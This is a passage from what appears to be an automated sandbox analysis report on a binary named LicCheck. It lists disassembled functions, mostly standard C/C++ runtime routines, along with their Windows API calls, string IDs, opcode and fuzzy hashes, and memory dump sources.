                                                                                                    • Opcode ID: b29fee677e1f8adf0cff06b10dee42dcf993d4b250977128113dcb6e1f4aaf67
                                                                                                    • Instruction ID: db23b903021b0bddd2903d058dbb56872f26d854d934987a6df09a22aea2c9a8
                                                                                                    • Opcode Fuzzy Hash: b29fee677e1f8adf0cff06b10dee42dcf993d4b250977128113dcb6e1f4aaf67
                                                                                                    • Instruction Fuzzy Hash: E8419171D01614CFCF21DF98E844B9EB7B0FB89720F14425AE815A7391DB39AD05CBA1
                                                                                                    Function 007A879C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,007A8793,007A65FF,007A5D1C), ref: 007A87AA
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007A87B8
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007A87D1
                                                                                                    • SetLastError.KERNEL32(00000000,007A8793,007A65FF,007A5D1C), ref: 007A8823
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
                                                                                                    • Opcode ID: ee643884448b2573c231db41aa161f4dc315ebc71bfef394d172f44303b5a550
                                                                                                    • Instruction ID: 0c9f40e21181b3bd2bcd57f085ac1ec57bcae2b2ef041e845bb1b30fa581e745
                                                                                                    • Opcode Fuzzy Hash: ee643884448b2573c231db41aa161f4dc315ebc71bfef394d172f44303b5a550
                                                                                                    • Instruction Fuzzy Hash: 4001243211E611EEA76027B47C8AA2B2798EBC3375770832FF220860E0EF2D5C1255C5
                                                                                                    Function 007A88B3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer
                                                                                                    • String ID: 0'y
                                                                                                    • API String ID: 1740715915-674645887
                                                                                                    • Opcode ID: a1e7bf18b683d398428f9ad218bd0f335f2ac984db36756fdeefbe33bff645e6
                                                                                                    • Instruction ID: 48ec6c8a6e93c6023fae4ef5409d5d26da5bed09d78b4d69f21398442c5834b4
                                                                                                    • Opcode Fuzzy Hash: a1e7bf18b683d398428f9ad218bd0f335f2ac984db36756fdeefbe33bff645e6
                                                                                                    • Instruction Fuzzy Hash: 0151FE72A04206EFEB689F51C845B7B77A4EF86310F14462EE80657290EB39FD40CB93
                                                                                                    Function 00794050 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 149COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
                                                                                                      • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,61DA755C), ref: 007941E5
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0079429A
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
                                                                                                    • String ID: `$}$}
                                                                                                    • API String ID: 1043075861-513913037
                                                                                                    • Opcode ID: 054e1d983766b320edf91505d5dbab90fc6cfbf1ac2b42512ce33ffa2b834391
                                                                                                    • Instruction ID: cfb766ffe898568fc7dfda4f6bb1de98309ad2a81ddd9f378a7282428ac5cd2f
                                                                                                    • Opcode Fuzzy Hash: 054e1d983766b320edf91505d5dbab90fc6cfbf1ac2b42512ce33ffa2b834391
                                                                                                    • Instruction Fuzzy Hash: 8E61F670901258DFEF14DF64DD99F9DBBB4FB04304F1482A9E809AB291DB79AA84CF50
                                                                                                    Function 007B5713 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B58AB
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B58BE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: V{$V{
                                                                                                    • API String ID: 885266447-4053932452
                                                                                                    • Opcode ID: 256ff387539f1010bf5c0acab90b8cdf6643e990068d28c3f329292f4dc08f2c
                                                                                                    • Instruction ID: ca978870d7c747205d9f59878276ba2a5d880ea69bf27bca3793973ef81b47ed
                                                                                                    • Opcode Fuzzy Hash: 256ff387539f1010bf5c0acab90b8cdf6643e990068d28c3f329292f4dc08f2c
                                                                                                    • Instruction Fuzzy Hash: C1515C71E00649EFCF14DF98C891BEEBBB2EB89310F188159E955AB351D738AD42CB50
                                                                                                    Function 00793A20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00793ABF
                                                                                                      • Part of subcall function 007A691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,007A418F,?,007D3B78,00792904,string too long,00792904,?,?,?), ref: 007A697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                    • Opcode ID: 81e3d4498819990875a66a767802ffad174d0aedd8ff05f921ddb8ab7822221a
                                                                                                    • Instruction ID: fca80e9cefbe0df5d1f9b3a8ff9b8fe12cc806ce4bde36f146e40d36de131575
                                                                                                    • Opcode Fuzzy Hash: 81e3d4498819990875a66a767802ffad174d0aedd8ff05f921ddb8ab7822221a
                                                                                                    • Instruction Fuzzy Hash: 8411D5B2910704ABCB10DF59E845F9AB3E8EF45310F18863EF99897241F779BA148BD1
                                                                                                    Function 007A98E2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007A9893,00000000,?,007D67D4,?,?,?,007A9A36,00000004,InitializeCriticalSectionEx,007C7190,InitializeCriticalSectionEx), ref: 007A98EF
                                                                                                    • GetLastError.KERNEL32(?,007A9893,00000000,?,007D67D4,?,?,?,007A9A36,00000004,InitializeCriticalSectionEx,007C7190,InitializeCriticalSectionEx,00000000,?,007A97ED), ref: 007A98F9
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007A9921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                    • Opcode ID: d61b547cc48cade27ee0cc11d1418bf64b7ccfefdbc5752b75760e7b9a467b3b
                                                                                                    • Instruction ID: 5b1c1eb5d966aa99052152e4191aa54c1415d404d5ccd5f88f0e10263c4704e1
                                                                                                    • Opcode Fuzzy Hash: d61b547cc48cade27ee0cc11d1418bf64b7ccfefdbc5752b75760e7b9a467b3b
                                                                                                    • Instruction Fuzzy Hash: 22E04870640208B7DF101B61DC0AFDA3B549B85B50F158468FA0CE40E0D76AF8A0D5C4
                                                                                                    Function 007B2C18 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetConsoleOutputCP.KERNEL32(61DA755C,00000000,00000000,00000000), ref: 007B2C7B
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007B2ED6
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 007B2F1E
                                                                                                    • GetLastError.KERNEL32 ref: 007B2FC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2112829910-0
                                                                                                    • Opcode ID: 4271aee0a9445fa862b3c73fc8e537046a954a3c7e72062bba40c453b29951dc
                                                                                                    • Instruction ID: 65aecdf820617884cbf4ade752533852ba4159b58ef48d81f89ae0150f0d0f5c
                                                                                                    • Opcode Fuzzy Hash: 4271aee0a9445fa862b3c73fc8e537046a954a3c7e72062bba40c453b29951dc
                                                                                                    • Instruction Fuzzy Hash: 9BD15BB5E012589FCB15CFA8D884AEDBBB4FF48300F28452AE855E7352D734A942CB60
                                                                                                    Function 007B9EFD Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • GetLastError.KERNEL32 ref: 007B9F61
                                                                                                    • __dosmaperr.LIBCMT ref: 007B9F68
                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 007B9FA2
                                                                                                    • __dosmaperr.LIBCMT ref: 007B9FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1913693674-0
                                                                                                    • Opcode ID: 6845cba103611f712746a4fd06124af2a091a5f19dcfacb2bb6282cd1a968004
                                                                                                    • Instruction ID: 8b40c593a9a945fa45a58d75d5be7c49703aeed80c64b9dd5f5f48ac5a162d2f
                                                                                                    • Opcode Fuzzy Hash: 6845cba103611f712746a4fd06124af2a091a5f19dcfacb2bb6282cd1a968004
                                                                                                    • Instruction Fuzzy Hash: 9C218071604615EF9B10AF65C884EBBBBA9FF453747108618FB29D7251E738EC408BA0
                                                                                                    Function 007AF07B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8da1d299b83ef99830077aa75932ceaea627b4e14433b85770e58f1cb10afcb
                                                                                                    • Instruction ID: 94c4b87227183acdabad28a104cff1043f93e99fb2b8c5f340c3cb58a61f74be
                                                                                                    • Opcode Fuzzy Hash: b8da1d299b83ef99830077aa75932ceaea627b4e14433b85770e58f1cb10afcb
                                                                                                    • Instruction Fuzzy Hash: 9321D132600209EF9B24AFB0CC8496BB7A9FF92364B108738F815C7141E738EC4187A0
                                                                                                    Function 007BAE93 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 007BAE9B
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BAED3
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BAEF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 158306478-0
                                                                                                    • Opcode ID: 1f37d851e312619bde4c8f521b79e29b01003a02060709f36a080c9a082515d1
                                                                                                    • Instruction ID: 2a00abed60a8a7055a23afad76725cb70682eec7188a91bbb3c3529f78c08083
                                                                                                    • Opcode Fuzzy Hash: 1f37d851e312619bde4c8f521b79e29b01003a02060709f36a080c9a082515d1
                                                                                                    • Instruction Fuzzy Hash: 3D11A1F1505615BE661137B16CCEEFF7E6CDE883943204119F501D1101FB2DDE8185B2
                                                                                                    Function 007C1D47 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000), ref: 007C1D5E
                                                                                                    • GetLastError.KERNEL32(?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000,00000000,?,007B35D3,00000000), ref: 007C1D6A
                                                                                                      • Part of subcall function 007C1D30: CloseHandle.KERNEL32(FFFFFFFE,007C1D7A,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000,00000000), ref: 007C1D40
                                                                                                    • ___initconout.LIBCMT ref: 007C1D7A
                                                                                                      • Part of subcall function 007C1CF2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007C1D21,007BE20F,00000000,?,007B3015,00000000,00000000,00000000,00000000), ref: 007C1D05
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000), ref: 007C1D8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744216297-0
                                                                                                    • Opcode ID: 0269031b414c863d1df983fed1bb076b7b5a8e1ef7a5dea92e04cab96dfbdf75
                                                                                                    • Instruction ID: 0c06b247bea809d391bfa330de4cf490e932b1397943cfc8fd8c74b5e10f6303
                                                                                                    • Opcode Fuzzy Hash: 0269031b414c863d1df983fed1bb076b7b5a8e1ef7a5dea92e04cab96dfbdf75
                                                                                                    • Instruction Fuzzy Hash: DBF01236100525BBCF221F91DC08E9D3F26FF453A1F808128FD1D85521CA36D8A09B94
                                                                                                    Function 007BB834 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 373COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8Q}$8Q}
                                                                                                    • API String ID: 0-1212950194
                                                                                                    • Opcode ID: 3e741481c134a2c53d6c404328022dd19f9d19e851e102714403225061f4a083
                                                                                                    • Instruction ID: b3e8d732ddf2f99a72a40b317e3a0104e4e0b155e5adbcc9c26291b8e3020334
                                                                                                    • Opcode Fuzzy Hash: 3e741481c134a2c53d6c404328022dd19f9d19e851e102714403225061f4a083
                                                                                                    • Instruction Fuzzy Hash: 94C123B2D44204ABDB20DBA8CC86FDE77F8AF48740F154165FA05FB282D674DD418BA4
                                                                                                    Function 007AE29A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 357COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID: `v|$w|
                                                                                                    • API String ID: 1807457897-2088649157
                                                                                                    • Opcode ID: dcd4da3b7c7d64f72be294adf7873de2e0f9427aac355f1c0799643df732c561
                                                                                                    • Instruction ID: 0a6d10fd55bc5d930c865f920682f1aae8e9a67d6788d4567c42cc29da07f50c
                                                                                                    • Opcode Fuzzy Hash: dcd4da3b7c7d64f72be294adf7873de2e0f9427aac355f1c0799643df732c561
                                                                                                    • Instruction Fuzzy Hash: 40D1A0B1D00305DFDB11DF64C885BEEBBF5BF49300F144629E895AB242EB79A945CB60
                                                                                                    Function 007AED7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 007AEE0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: ff0dae008e93e09ac0d76df3cef7fdbb431d27a5e0a4d21cef6e2c84004ae2c5
                                                                                                    • Instruction ID: 29eca2b72b3b8e1a8b61206c1243bdb49f98a4a89db738ca57725cff4640a5f8
                                                                                                    • Opcode Fuzzy Hash: ff0dae008e93e09ac0d76df3cef7fdbb431d27a5e0a4d21cef6e2c84004ae2c5
                                                                                                    • Instruction Fuzzy Hash: 49517D61E0D102D6DB267B14C9453FA7B94DF81740F248E5CF3E6822E9EB3D8C919A4A
                                                                                                    Function 00793930 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00793ABF
                                                                                                      • Part of subcall function 007A691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,007A418F,?,007D3B78,00792904,string too long,00792904,?,?,?), ref: 007A697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                    • Opcode ID: 47da3e3f97ec8abf1498c0603519225dce2c479818011078bc42ea39fb9c2437
                                                                                                    • Instruction ID: 3f727a9043c16392918abe238117ca1fb3abec580144b0ae9730fef87ce14538
                                                                                                    • Opcode Fuzzy Hash: 47da3e3f97ec8abf1498c0603519225dce2c479818011078bc42ea39fb9c2437
                                                                                                    • Instruction Fuzzy Hash: EC51D6B1910608ABCB04DF58D845FAEB7F8EF45710F14822EF95497781E778AA44CBA1
                                                                                                    Function 00796210 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 007962F7
